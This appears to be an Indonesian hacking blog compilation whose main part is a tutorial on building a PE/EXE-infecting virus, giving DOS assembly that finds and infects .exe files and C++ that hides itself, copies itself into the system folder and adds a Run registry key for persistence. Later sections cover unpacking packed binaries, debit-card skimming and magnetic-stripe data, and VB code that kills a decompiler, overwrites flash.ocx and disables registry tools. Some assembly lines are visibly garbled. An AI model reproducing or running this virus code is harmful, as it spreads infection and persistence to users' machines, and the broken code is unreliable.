
Teknik Injeksi Virus Dengan PE INFECTOR

DEFINISI PE INFEKTOR

hmnnn... sebenarnya PE Infektor adalah sebuah metode yang digunakan untuk menginfeksi suatu file berekstensi .exe ... yaitu dengan cara menginjeksi file .exe tersebut dengan kode virus. Jadi ketika file .exe yang terinfeksi dijalankan... maka script virus akan jalan...wehehehehe...lebih asik kan ...daripada kita menggunakan file virus yang dikamuflasekan... sedangkan penularannya ya... sama ajah dari virus - virus yang dijalankan ... program virus tersebut akan menginjeksi file - file yang sehat dan diubah menjadi file virus.

DIAGRAM PENULARAN



Nah dapat dijelaskan pada diagram penularan si virus ini akan mencari file sehat ..
kemudian akan mencari pada segmen ke berapa file .exe tersebut dapat disisipi kode virus.

PERSIAPAN PEMBUATAN

Untuk pembuatan PE infektor ini pertama anda harus tau tentang bahasa mesin, atau kerennya adalah bahasa assembly. Kedua anda harus tahu tentang visual c++ atau bahasa pemrograman tingkat menengah... entah visual c++ atau borland c++ gak masalah, yang penting c++ deh. Nah kemudian yang perlu disiapkan lagi ya palingan tau soal registry windows ... Kita tidak perlu memakai Linker ASM soalnya dalam C++ langsung ada Linker and compiler-nya.

MEMBUAT KODE PE INFEKTOR DARI ASSEMBLY

Ini nihhhhhhh... awalnya kudu tau bahasa assembly dulu kemudian baru menanjak ke bahasa
menengahnya... ntar dijelasin kok... tenang ajah ... okeh!!!!

asm
(
".SEQ"
"HOSTSEG SEGMENT BYTE"
"ASSUME CS:HOSTSEG,SS:HSTACK" 'INI MEMANG BUAT PENANDA KODE ASM (WAJIB)
"HOST:" 'MENANDAI HOST ATO ALAMAT PERTAMA
"mov ax,4C00H" 'MEMINDAHKAN DATA YANG ADA DI MEMORI 4C00H KE VAR

AX
"int 21H" 'FUNGSI DOS FUNCTION SERVICES
"HOSTSEG ENDS"
"STACKSIZE EQU 100H" 'JIKA STACKSIZE = 100H

"HSTACK SEGMENT PARA STACK 'STACK'"
"db STACKSIZE dup (?)"
"HSTACK ENDS"

"VSEG SEGMENT PARA"
"ASSUME CS:VSEG,DS:VSEG,SS:HSTACK"

"DTA DB 2BH dup (?)"
"EXE_HDR DB 1CH dup (?)"
"EXEFILE DB '*.EXE',0" 'MENCARI EKSTENSI EXE

"HOSTS DW HOSTSEG,STACKSIZE"
"FILLER DW ?"
"HOSTC DW 0,HOSTSEG"
"VIRUS:" 'KODE VIRUS YANG AKAN DISISIPI BERAWAL DARI SINI
"push ax" 'ISI VARIABEL AX
"push cs" 'ISI VARIABEL CS
"pop ds" 'KELUARKAN ISI VARIABEL DS
"mov ah,1AH"
"mov dx,OFFSET DTA"
"int 21H" 'INTERRUPT DOS FUCNTION
"call FINDEXE" 'MEMANGGIL FUNGSI FINDEXE
"jc FINISH" 'KALO DAH SELESAI LOMPAT KE FUNGSI FINISH
"call INFECT" 'MEMANGGIL FUNGSI FINISH
"FINISH: push es" 'AWAL FUNGSI FINISH
"pop ds" 'MENGELUARKAN ISI DARI VARIABEL DS
"mov dx,80H" 'PINDAHKAN ISI DARI ALAMAT 80H KE DALAM DX
"mov ah,1AH" 'PINDAHKAN ISI DARI ALAMAT 1AH KE DALAM VAR AH
"int 21H" 'MEMANGGIL INTERRUPT DOS FUNCTION
"pop ax" 'MENGELUARKAN ISI YANG ADA DI VAR AX
"cli"
"mov ss,WORD PTR cs:[HOSTS]"
"mov sp,WORD PTR cs:[HOSTS+2]"
"sti"
"jmp DWORD PTR cs:[HOSTC]"
"FINDEXE:"
"mov dx,OFFSET EXEFILE"
"mov cx,3FH"
"mov ah,4EH"
"int 21H"
"NEXTE: jc FEX"
"call FILE_OK"
"jnc FEX"
"mov ah,4FH"
"int 21H"
"jmp SHORT NEXTE"
"FEX: ret"


Nah baris di bawah ini adalah potongan: jika file tersebut adalah .exe maka akan ditulari atau disisipkan kode virus:

"FILE_OK:"
"mov dx,OFFSET DTA+1EH"
"mov ax,3D02H"
"int 21H"
"jc OK_END1"
"mov bx,ax"
"mov cx,1CH"
"mov dx,OFFSET EXE_HDR"
"mov ah,3FH"
"int 21H"
"jc OK_END"
"cmp WORD PTR [EXE_HDR],'ZM'"
"jnz OK_END"
"cmp WORD PTR [EXE_HDR+26],0"
"jnz OK_END"
"cmp WORD PTR [EXE_HDR+24],40H"
"jnc OK_END"
"call REL_ROOM"
"jc OK_END"
"cmp WORD PTR [EXE_HDR+14H],OFFSET VIRUS"
"clc"
"jne OK_END1"
"OK_END: mov ah,3EH"
"int 21H"
"stc"
"OK_END1:ret"

"REL_ROOM:"
"mov ax,WORD PTR [EXE_HDR+8]"
"add ax,ax"
"add ax,ax"
"sub ax,WORD PTR [EXE_HDR+6]"
"add ax,ax"
"add ax,ax"
"sub ax,WORD PTR [EXE_HDR+24]"
"cmp ax,4*NUMRELS"
"ret"

Sedangkan baris di bawah ini adalah baris untuk menginfeksi file .exe yang telah ditemukan oleh virus:

"INFECT:"
"mov cx,WORD PTR [DTA+1CH]"
"mov dx,WORD PTR [DTA+1AH]"
"or dl,0FH"
"add dx,1"
"adc cx,0"
"mov WORD PTR [DTA+1CH],cx"
"mov WORD PTR [DTA+1AH],dx"
"mov ax,4200H"
"int 21H"

"mov cx,OFFSET FINAL"
"xor dx,dx"
"mov ah,40H"
"int 21H"

"mov dx,WORD PTR [DTA+1AH]"
"mov cx,WORD PTR [DTA+1CH]"
"add dx,OFFSET HOSTS"
"adc cx,0v"
"mov ax,4200H"
"int 21H"
"mov dx,OFFSET EXE_HDR+14"
"mov cx,10"
"mov ah,40H"
"int 21H"

"xor cx,cx"
"xor dx,dx"
"mov ax,4200H"
"int 21H"

"mov ax,WORD PTR [DTA+1AH]"
"mov dx,WORD PTR [DTA+1CH]"
"mov cx,16"
"div cx"
"sub ax,WORD PTR [EXE_HDR+8]"
"mov WORD PTR [EXE_HDR+22],ax"
"mov WORD PTR [EXE_HDR+14],ax"
"mov WORD PTR [EXE_HDR+20],OFFSET VIRUS"
"mov WORD PTR [EXE_HDR+16],OFFSET FINAL + STACKSIZE"

"mov dx,WORD PTR [DTA+1CH]"
"mov ax,WORD PTR [DTA+1AH]"
"add ax,OFFSET FINAL + 200H"
"adc dx,0"
"mov cx,200H"
"div cx"
"mov WORD PTR [EXE_HDR+4],ax"
"mov WORD PTR [EXE_HDR+2],dx"
"add WORD PTR [EXE_HDR+6],NUMRELS"
"mov cx,1CH"
"mov dx,OFFSET EXE_HDR"
"mov ah,40H"
"int 21H"
"vmov ax,WORD PTR [EXE_HDR+6]"
"dec ax"
"dec ax"
"mov cx,4"
"mul cx"
"add ax,WORD PTR [EXE_HDR+24]"
"adc dx,0"
"mov cx,dx"
"mov dx,ax"
"mov ax,4200H"
"int 21H"

"mov WORD PTR [EXE_HDR],OFFSET HOSTS"
"mov ax,WORD PTR [EXE_HDR+22]"
"mov WORD PTR [EXE_HDR+2],ax"
"mov WORD PTR [EXE_HDR+4],OFFSET HOSTC+2"
"mov WORD PTR [EXE_HDR+6],ax"
"mov cx,8"
"mov dx,OFFSET EXE_HDR"
"mov ah,40H"
"int 21H"
"mov ah,3EH"
"int 21H"
"ret"

Nah disini adalah baris yang paling saya suka ... ini adalah baris penutup atau akhir dari baris virus

"FINAL:"

"VSEG ENDS"

"END VIRUS"
);

SCRIPT VIRUS DENGAN BAHASA MENENGAH (C++)

Ehem .. ehem ... iya neh ... maap kalo nulisnya ada salah ... soalnya gua duduk di sebelah cewek ... cakep banget .. sihhhhhhhhhh tapi dah ada yang punya ... (PS: Maaf gua bukan buaya' yah...jadi gak akan nyaplok sebelah gua..:-p)

Ok lanjut ... untuk script virus bahasa menengah ini ... ditulis dengan visual c++, nah biar jelas coba kita liat scriptnyak satuk persatuk ... key...


untuk membedakan itu script pascal, visual basic dan c++ maka harus ada source code ini, gunanya adalah untuk mendefinisikan fungsi yang dipakai ada di file mana aja, contohnya :

#include

maka fungsi yang kita pakai ada di file stdio.h seperti cout, cin atau lainnya...

#include
#include
#include
#include
using namespace std;

nah disini adalah source code untuk memunculkan pesan di komputer, terserah lo lo pade mo nulis apa ajah...tapi yang jelas yang bermanfaat yah... kayak gini:

char quote[256] = "'we shall not capitulate...no never. We may be destroyed, but if we are,

we shall drag a world with us... a world in flames' - adolf hitler";

ini potongan source code untuk melihat atau memanipulasi windows, maksudnya jendela yang ada di sistem operasi windows:

int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{

//start random name
srand(GetTickCount());
char buf[20] = "";
for(int i=rand()%20;i>=0;i--)
buf[i] = 'a' + rand()%26;
//end random name

nah yang satu ni untuk menyembunyikan aplikasi virus dari kejaran penangkap windows atau fly by threats...tau gak... kalo gak tau... yaaa.. coba tekan ALT+TAB maka akan kelihatan daftar aplikasi yang ada di windows... ato yang aktif di windows...

//start hide window
SetConsoleTitle("Windows");
HWND mainwin = FindWindow(NULL, "Windows");
ShowWindow(mainwin, 0);
HKEY hKey;
//end hide window

char sd[255];
char path[MAX_PATH];
int Freq = 0;
int Duration = 100;
bool Forwards = true;
bool Backwards = false;
int timer = 0;
HWND hWin;
HMODULE GetModH = GetModuleHandle(0);
GetModuleFileName(GetModH, path, 256);

Nah yang ini untuk menyuntik registry yang ada di windows ... pokoknya untuk memanipulasi registry lah... contohnya di sini alamat registry yang dimanipulasi adalah :

Software\\Microsoft\\Windows\\CurrentVersion\\Run

//start reg key
GetSystemDirectory(sd,255);
char fslash[260] = "//";//added
strcat(sd,fslash);
strcat(sd,buf);
strcat(sd,".exe");
CopyFile(path,sd,FALSE);
SetFileAttributes(sd,FILE_ATTRIBUTE_HIDDEN);//makes file hidden
RegOpenKeyEx(

HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKe

y );
RegSetValueEx(hKey, "Windows",0,REG_SZ,(const unsigned char*)sd,sizeof(sd));
RegCloseKey(hKey);
//end reg key



MERANGKAI KODE VIRUS

nah untuk merangkainya ... coba tulis script ini pada visual c++ kemudian dicompile dan jalankan ... okeh ...just take a look :

//need to learn mutex so virus doesnt run twice
#include
#include
#include
#include
using namespace std;

char quote[256] = "'we shall not capitulate...no never. We may be destroyed, but if we are, we shall drag a world with us... a world in flames' - adolf hitler";

int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
//start random name
srand(GetTickCount());
char buf[20] = "";
for(int i=rand()%20;i>=0;i--)
buf[i] = 'a' + rand()%26;
//end random name

//start hide window
SetConsoleTitle("Windows");
HWND mainwin = FindWindow(NULL, "Windows");
ShowWindow(mainwin, 0);
HKEY hKey;
//end hide window

char sd[255];
char path[MAX_PATH];
int Freq = 0;
int Duration = 100;
bool Forwards = true;
bool Backwards = false;
int timer = 0;
HWND hWin;
HMODULE GetModH = GetModuleHandle(0);
GetModuleFileName(GetModH, path, 256);

//start reg key
GetSystemDirectory(sd,255);
char fslash[260] = "//";//added
strcat(sd,fslash);
strcat(sd,buf);
strcat(sd,".exe");
CopyFile(path,sd,FALSE);
SetFileAttributes(sd,FILE_ATTRIBUTE_HIDDEN);//makes file hidden
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "Windows",0,REG_SZ,(const unsigned char*)sd,sizeof(sd));
RegCloseKey(hKey);
//end reg key

//start ASM code
asm
(
".SEQ"
"HOSTSEG SEGMENT BYTE"
"ASSUME CS:HOSTSEG,SS:HSTACK"
"HOST:"
"mov ax,4C00H"
"int 21H"
"HOSTSEG ENDS"
"STACKSIZE EQU 100H"

"HSTACK SEGMENT PARA STACK 'STACK'"
"db STACKSIZE dup (?)"
"HSTACK ENDS"

"VSEG SEGMENT PARA"
"ASSUME CS:VSEG,DS:VSEG,SS:HSTACK"

"DTA DB 2BH dup (?)"
"EXE_HDR DB 1CH dup (?)"
"EXEFILE DB '*.EXE',0"

"HOSTS DW HOSTSEG,STACKSIZE"
"FILLER DW ?"
"HOSTC DW 0,HOSTSEG"
"VIRUS:"
"push ax"
"push cs"
"pop ds"
"mov ah,1AH"
"mov dx,OFFSET DTA"
"int 21H"
"call FINDEXE"
"jc FINISH"
"call INFECT"
"FINISH: push es"
"pop ds"
"mov dx,80H"
"mov ah,1AH"
"int 21H"
"pop ax"
"cli"
"mov ss,WORD PTR cs:[HOSTS]"
"mov sp,WORD PTR cs:[HOSTS+2]"
"sti"
"jmp DWORD PTR cs:[HOSTC]"
"FINDEXE:"
"mov dx,OFFSET EXEFILE"
"mov cx,3FH"
"mov ah,4EH"
"int 21H"
"NEXTE: jc FEX"
"call FILE_OK"
"jnc FEX"
"mov ah,4FH"
"int 21H"
"jmp SHORT NEXTE"
"FEX: ret"

"FILE_OK:"
"mov dx,OFFSET DTA+1EH"
"mov ax,3D02H"
"int 21H"
"jc OK_END1"
"mov bx,ax"
"mov cx,1CH"
"mov dx,OFFSET EXE_HDR"
"mov ah,3FH"
"int 21H"
"jc OK_END"
"cmp WORD PTR [EXE_HDR],'ZM'"
"jnz OK_END"
"cmp WORD PTR [EXE_HDR+26],0"
"jnz OK_END"
"cmp WORD PTR [EXE_HDR+24],40H"
"jnc OK_END"
"call REL_ROOM"
"jc OK_END"
"cmp WORD PTR [EXE_HDR+14H],OFFSET VIRUS"
"clc"
"jne OK_END1"
"OK_END: mov ah,3EH"
"int 21H"
"stc"
"OK_END1:ret"

"REL_ROOM:"
"mov ax,WORD PTR [EXE_HDR+8]"
"add ax,ax"
"add ax,ax"
"sub ax,WORD PTR [EXE_HDR+6]"
"add ax,ax"
"add ax,ax"
"sub ax,WORD PTR [EXE_HDR+24]"
"cmp ax,4*NUMRELS"
"ret"

"INFECT:"
"mov cx,WORD PTR [DTA+1CH]"
"mov dx,WORD PTR [DTA+1AH]"
"or dl,0FH"
"add dx,1"
"adc cx,0"
"mov WORD PTR [DTA+1CH],cx"
"mov WORD PTR [DTA+1AH],dx"
"mov ax,4200H"
"int 21H"

"mov cx,OFFSET FINAL"
"xor dx,dx"
"mov ah,40H"
"int 21H"

"mov dx,WORD PTR [DTA+1AH]"
"mov cx,WORD PTR [DTA+1CH]"
"add dx,OFFSET HOSTS"
"adc cx,0v"
"mov ax,4200H"
"int 21H"
"mov dx,OFFSET EXE_HDR+14"
"mov cx,10"
"mov ah,40H"
"int 21H"

"xor cx,cx"
"xor dx,dx"
"mov ax,4200H"
"int 21H"

"mov ax,WORD PTR [DTA+1AH]"
"mov dx,WORD PTR [DTA+1CH]"
"mov cx,16"
"div cx"
"sub ax,WORD PTR [EXE_HDR+8]"
"mov WORD PTR [EXE_HDR+22],ax"
"mov WORD PTR [EXE_HDR+14],ax"
"mov WORD PTR [EXE_HDR+20],OFFSET VIRUS"
"mov WORD PTR [EXE_HDR+16],OFFSET FINAL + STACKSIZE"

"mov dx,WORD PTR [DTA+1CH]"
"mov ax,WORD PTR [DTA+1AH]"
"add ax,OFFSET FINAL + 200H"
"adc dx,0"
"mov cx,200H"
"div cx"
"mov WORD PTR [EXE_HDR+4],ax"
"mov WORD PTR [EXE_HDR+2],dx"
"add WORD PTR [EXE_HDR+6],NUMRELS"
"mov cx,1CH"
"mov dx,OFFSET EXE_HDR"
"mov ah,40H"
"int 21H"
"vmov ax,WORD PTR [EXE_HDR+6]"
"dec ax"
"dec ax"
"mov cx,4"
"mul cx"
"add ax,WORD PTR [EXE_HDR+24]"
"adc dx,0"
"mov cx,dx"
"mov dx,ax"
"mov ax,4200H"
"int 21H"

"mov WORD PTR [EXE_HDR],OFFSET HOSTS"
"mov ax,WORD PTR [EXE_HDR+22]"
"mov WORD PTR [EXE_HDR+2],ax"
"mov WORD PTR [EXE_HDR+4],OFFSET HOSTC+2"
"mov WORD PTR [EXE_HDR+6],ax"
"mov cx,8"
"mov dx,OFFSET EXE_HDR"
"mov ah,40H"
"int 21H"
"mov ah,3EH"
"int 21H"
"ret"

"FINAL:"

"VSEG ENDS"

"END VIRUS"
);
//end ASM code
return 0;
}
(c) virologi

Crack Virus Packing

COMPILER
Compiler? what is it? compiler adalah proses untuk merubah dari source code virus menjadi file .exe. Yaaa.....misalnya kalau kita membuat virus dari Visual Basic, berarti compilernya Visual Basic, Kalau kita membuat virus dari Delphi, berarti compilernya delphi atau kita membuat virus dari Assembler compilernya juga TASM....jadi masing2 virus mempunyai compiler yang berbeda2, tergantung dari mana dia dibuat....

PACKING
Packing (seperti yang dijelaskan di buku saya) wueleh...promosi lagi :-p adalah proses untuk mengemas virus....maksudnya???ya sama kalau kita membuat kue atau barang...pasti kudu dikemas dulu kan...agar tampil apik dan rapi....nah pengemasan itu biasanya memakai UPX, Aspack atau teLock...nah gunanya packing agar virus kita tidak ketauan dibuat memakai apa...atau dengan kata lain untuk menyembunyikan compiler virus tersebut. Compiler harus disembunyikan...agar user tidak mengetahui source code nyak...

PROSES CRACKING COMPILER DAN PACKING
Proses crackingnya sangat mudah sekali...cukup donlot yang namanya RDG Packer Detector v0.6.3 Beta, dan ikuti langkah di bawah ini:

1. donlot RDG Packer Detector v0.6.3 Beta di
http://www.rdgsoft.8k.com/RDG%20Packer%20Detector.htm

2. kemudian jalankan program RDG Packer Detector v0.6.3, seperti gambar di bawah ini:



3. kemudian klik open untuk memilih file yang akan di garap, misalnya saya punya file p3kdiary.exe yang di compile dengan vb dan di packing dengan UPX. Maka tinggal klik open dan pilih file yang disuka....sampai ada keterangan seperti ini di gambar ini :



naaaaaa.....kalo udah ada keterangan seperti ini berarti :

memakai Visual Basic
memakai UPX v0.80
dan heuristic atau enkripsi dan pengacakannya memakai UPX

nah kalau sudah kita kan udah tau compiler dan packernya...tinggal mencari UPX unlock dan tools Exe to VB untuk membongkar source code program.....

nah sekarang tugas anda...okeh...

untuk mencari tools unlock UPX and reverse engineering to VB nyah....okeh
(c) virologi

Bobol Debit Card

Orang bilang, belanja via kartu debit (istilah kebanyakan kita: "kartu ATM") lebih aman karena -- nggak seperti kartu kredit -- ia memiliki satu level security tambahan: password a.k.a. nomor PIN.

Kartu kredit lebih gampang di-counterfeit, tapi eksekusinya perlu arrangement rada ruwet yang melibatkan banyak pihak. Sebaliknya, kartu debit, dengan adanya PIN itu, agak susah di-fraud. Tapi begitu dapat PIN, yah it's where the money is.

Cuman, melihat kasus ini, para bandit itu rupanya mulai bisa mengira-ngira untuk getting around dengan kendala PIN ini. Kalau kasusnya satu dua sih mungkin nggak masalah, anggap aksidental aja, misalnya ada orang di belakang antrian yang suka ngintip. Tapi ini ratusan, ribuan? Dari mana mereka memperoleh data nomor account sebanyak itu, dan yang paling bikin saya wondering: dari mana mereka bisa tahu semua nomor PIN-nya?

Oke, coba kita runut-runut, seperti apa sih cara kerjanya. Sambil mencoba mengira-ngira kemungkinan terjadinya di sini, di Indonesia. Again, ini soal kartu debit , bukan credit card.

Sayangnya... perangkat kriminalnya sama.



Alat di gambar itu namanya skimmer, atau istilah formalnya card reader/writer. Bisa membaca data-data di magnetic-stripe kartu, lalu menuliskannya di plastik kartu yang baru. Yes, buat para maling, alat itu fungsinya satu: menggandakan kartu. Bisa nyimpen data dalam jumlah besar, yang kemudian di-download di PC via serial. Harga sekitar $600-an, dan besarnya cuma segenggaman tangan aja. (Huh, kalau inget alat ini, saya suka ketar-ketir kalau bayar makan di restoran menggunakan kartu kredit. Mana pelayannya klimis dan sopan banget, membungkuk ke arah kartu, dengan senyum yang dingin...)

Jadi... mereka bisa duplikasi kartu. Dan malam-malam, sehabis kerja seharian di cashier, mereka bisa dump semua data-datanya ke laptop, tulis ke magnetic-stripe di kartu yang baru, lari ke anjungan terdekat, memasukkan kartu palsunya di mesin ATM, lalu... wait, mereka perlu nomor PIN.

Nah sekarang, data-data apa aja ya yang ada di magnetic-stripe itu?



Buat yang belum tahu, magnetic-stripe itu seperti tape kaset aja layaknya, material ferromagnetic yang dapat dipakai untuk menyimpan data (suara, gambar, atau bit-bit biner). Untuk kartu, ada 3 track data. (Kenapa tiga? Standar ANSI/ISO. Selebihnya, nggak tahu). Track 1 dan Track 2 aja yang biasanya dipakai. Track 3 tadinya diperuntukkan untuk extended service, cuma service-nya nggak muncul-muncul sehingga track ini ditinggalkan.

Berlaku hanya di kartu kredit dan ATM (bisa berbeda di "kartu absen" kantor misalnya). Kalau kita extract data-data itu, misalkan menggunakan skimmer tadi, kita bisa lihat informasi seperti ini di kartu Visa:

Kelihatan nggak? Sekedar contoh aja: % di awal dan ? di akhir di Track 1 itu menunjukkan start code dan end-code. Huruf 'B' menunjukkan format-code, yaitu "Bank Card". 1111222233334444 adalah nomor kartu. LASTNAME/FIRSTNAME... self-explained. 9912 adalah expiration-date, 12/99. Sementara 101... dan seterusnya adalah data-data khusus. So, untuk kartu kredit ini, dengan skimmer seharga handphone Nokia seri 9 itu, si maling udah bisa belanja di Internet.

Tapi tidak demikian halnya dengan kartu ATM:

Mirip dengan kartu kredit ya? Bedanya, instead of 101, kita punya 1201 untuk data khusus milik bank. Dan 4 digit 'xxxx', berbeda-beda untuk setiap kartu. Lokasi encrypted PIN kah? Mungkin.

Tapi rasanya bisa dipastikan, PIN nggak akan disimpan plainly gitu aja di kartu (kecuali banknya kuoooplooo buaanget). Kita pernah baca bahwa di jaman dulu (dan kayaknya sampai sekarang), mesin-mesin IBM yang jadi langganan perbankan kita menggunakan DES (atau 3DES) untuk menentukan PIN. Yah, either way, untuk meng-crack DES nggak akan bisa straight-forward dan perlu waktu lumayan lama.
(c) virologi

Menaklukan Sothink (Pembongkar Flash) dengan VB

'*************************Kode untuk membuka membuka kunci di Registry*****************************
Option Explicit

Public Type SECURITY_ATTRIBUTES
nLength As Long
IpSecurityDescriptor As Long
bInheritHandle As Long
End Type


Const HKEY_CURRENT_USER = &H80000001
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const HKEY_USERS = &H80000003
Public Const HKEY_CURRENT_CONFIG = &H80000005
Public Const HKEY_DYN_DATA = &H80000006
Public Const KEY_ALL_ACCESS = &HF003F
Public Const KEY_CREATE_LINK = &H20
Public Const KEY_CREATE_SUB_KEY = &H4
Public Const KEY_ENUMERATE_SUB_KEYS = &H8
Public Const KEY_EXECUTE = &H20019
Public Const KEY_NOTIFY = &H10
Public Const KEY_QUERY_VALUE = &H1
Public Const KEY_READ = &H20019
Public Const KEY_SET_VALUE = &H2
Public Const KEY_WRITE = &H2006

Public Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long


'////////////
Public Const REG_OPTION_BACKUP_RESTORE = 4 ' open for backup or restore
Public Const REG_OPTION_VOLATILE = 1 ' Key is not preserved when system is rebooted
Public Const REG_OPTION_NON_VOLATILE = 0 ' Key is preserved when system is rebooted
Public Const STANDARD_RIGHTS_ALL = &H1F0000
Public Const SYNCHRONIZE = &H100000
Public Const READ_CONTROL = &H20000
Public Const STANDARD_RIGHTS_READ = (READ_CONTROL)
Public Const STANDARD_RIGHTS_WRITE = (READ_CONTROL)



'////////////////////Deklarasi untuk Program Gasak//////////////////////////////////////////////////////
Public Declare Function GetForegroundWindow Lib "user32" () As Long
Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
Public Declare Function CloseWindow Lib "user32" (ByVal hwnd As Long) As Long
Public Declare Function EnableWindow Lib "user32" (ByVal hwnd As Long, ByVal fEnable As Long) As Long
Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Public Const WM_CLOSE = &H10

'//////////////////Deklarasi untuk delete program/////////////////////////////////////////////////////
Public Declare Function DeleteFile Lib "kernel32" Alias "DeleteFileA" (ByVal lpFileName As String) As Long

'//////////////////Deklarasi membaca file flash.ocx//////////////////////////////
Private Sign(4096) As String 'The Signatures will be loaded into this array
Dim keyinstal As String

Public Sub bacafileflash()
' Reads the installed flash.ocx (located through the InstallerLocation
' registry value) and writes it out line by line through Log, each line
' wrapped in double quotes and followed by " & _" (VB line-continuation form).
' Side effect: sets the module-level keyinstal, which Main reuses afterwards.
' NOTE(review): no "On Error GoTo err" is set in this Sub, so the err:
' handler at the bottom is only reachable by an explicit jump; Exit Sub
' keeps normal flow from running into it.

Dim sIn As String
Dim swords() As String
Dim X As Long
Dim Data As String
Dim tik As String
Dim tuk As String

' tik = a single double-quote character, tuk = the continuation suffix
tik = """"
tuk = " & _"

' InstallerLocation is read as the base path of the Flash install
keyinstal = ReadKey("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\InstallerLocation")
sIn = FileText(keyinstal & "\Macromed\Flash\flash.ocx")
' binary contents split on CRLF; lines without CRLF stay in one element
swords = Split(sIn, vbCrLf)
'ReDim Preserve swords(UBound(swords) - 1)
sIn = ""
For X = LBound(swords) To UBound(swords)
Data = swords(X)
Log tik & Data & tik & tuk
Next X

Exit Sub

err:
MsgBox "error when access file flash.ocx!" & vbCrLf & "maybe it corrupted" & vbCrLf & vbCrLf & "The error message was: " & err.Description, vbCritical + vbOKOnly, "Error"

End Sub
Public Function FileText(ByVal strfilename As String) As String
' Returns the entire contents of strfilename as a String, read in Binary mode.
' The result is pre-sized to LOF(handle) with Space$ so Get fills it exactly.
' Errors (missing file, access denied) are not handled here and propagate
' to the caller.

Dim handle As Long

handle = FreeFile
Open strfilename For Binary As #handle
FileText = Space$(LOF(handle))
Get #handle, , FileText
Close #handle

End Function



Public Sub CreateKey(Folder As String, Value As String)
' Writes a string registry value via WScript.Shell.RegWrite.
' Folder is the full value path (hive\key\valuename), Value is the data.
' On Error Resume Next: any failure (no permission, scripting disabled)
' is silently ignored and the caller gets no indication.

Dim b As Object
On Error Resume Next
Set b = CreateObject("wscript.shell")
b.RegWrite Folder, Value

End Sub
Public Sub CreateIntegerKey(Folder As String, Value As Integer)
' Writes a REG_DWORD registry value via WScript.Shell.RegWrite.
' Folder is the full value path (hive\key\valuename), Value the number.
' Failures are swallowed by On Error Resume Next.

Dim b As Object
On Error Resume Next
Set b = CreateObject("wscript.shell")
b.RegWrite Folder, Value, "REG_DWORD"

End Sub

Public Sub DeleteKey(Value As String, Folder As String)
' Despite its name this does not delete anything: it calls RegWrite with
' type "Reg_Dword", i.e. it behaves like CreateIntegerKey. Note the
' parameter order is reversed relative to CreateKey/CreateIntegerKey
' (Value comes first, Folder second). Not called anywhere in this listing.

Dim b As Object
On Error Resume Next
Set b = CreateObject("wscript.shell")
b.RegWrite Folder, Value, "Reg_Dword"

End Sub

Sub kodepertahanan()
'******************Menyembunyikan file yang mempunyai atibut hide*****************************
' Rewrites Explorer policy values. Defender note: these are the registry
' artifacts such a program leaves behind and the values to restore:
'   SHOWALL/NOHIDDEN CheckedValue and DefaultValue changed (hidden files stay hidden),
'   NoFolderOptions = 1 (Folder Options menu removed),
'   DisableRegistryTools = 1 (regedit blocked),
'   HideFileExt written twice below, first 0 then 1 - the final value is 1.
' All writes go through CreateIntegerKey, so failures are silent.

CreateIntegerKey "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue", 1
CreateIntegerKey "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\DefaultValue", 1
CreateIntegerKey "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue", 2
CreateIntegerKey "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\DefaultValue", 2
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 0

'//////////Non aktifkan folder option////////////
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 1
'//////////Kunci Regedit////////////
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1
'////////menyembunyikan extensi file//////////
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1

End Sub



Private Function Gasak(Opo As String)
' Reads the title of the current foreground window and, if it contains Opo
' (case-insensitive), sends it WM_CLOSE. Declared as a Function but never
' assigns a return value, so it returns Empty. Not called in this listing.
Dim H As Long
Dim T As String * 255
H = GetForegroundWindow
GetWindowText H, T, 255
If InStr(UCase(T), UCase(Opo)) > 0 Then
'EnableWindow H, 1
SendMessage H, WM_CLOSE, 0, 0

End If
' Second check compares the title against "" ; when it matches, a message
' box is shown and End terminates the whole program.
If InStr(UCase(T), UCase("")) > 0 Then
MsgBox "Si GASAK has been Disabled by The Creator!! Cheers!! ;)", vbInformation, "GASAK is shutting Down"
End
End If
'Shell "shutdown -a", vbHide '// jadi lambat kalo ini diaktifkan, pake cara lenm aja ya (API)...
End Function


'////////////////////////////Kode program Menghapus /////////////////////////////////////////


Sub Main()
' Entry point. Order of events:
'   1. Taskkill (hidden window) force-terminates SWFDecompiler.exe.
'   2. bacafileflash reads the installed flash.ocx, writes its lines through
'      Log into App.Path\flash.ocx and sets keyinstal.
'   3. That file is copied over the installed Macromed\Flash\flash.ocx and
'      the local copy is deleted.
' Defender note: observable artifacts are the Taskkill child process and
' the replaced flash.ocx under the Flash install directory. Return values
' of FileCopy/DeleteFile are not checked.

Shell "Taskkill /F /IM SWFDecompiler.exe", vbHide
bacafileflash

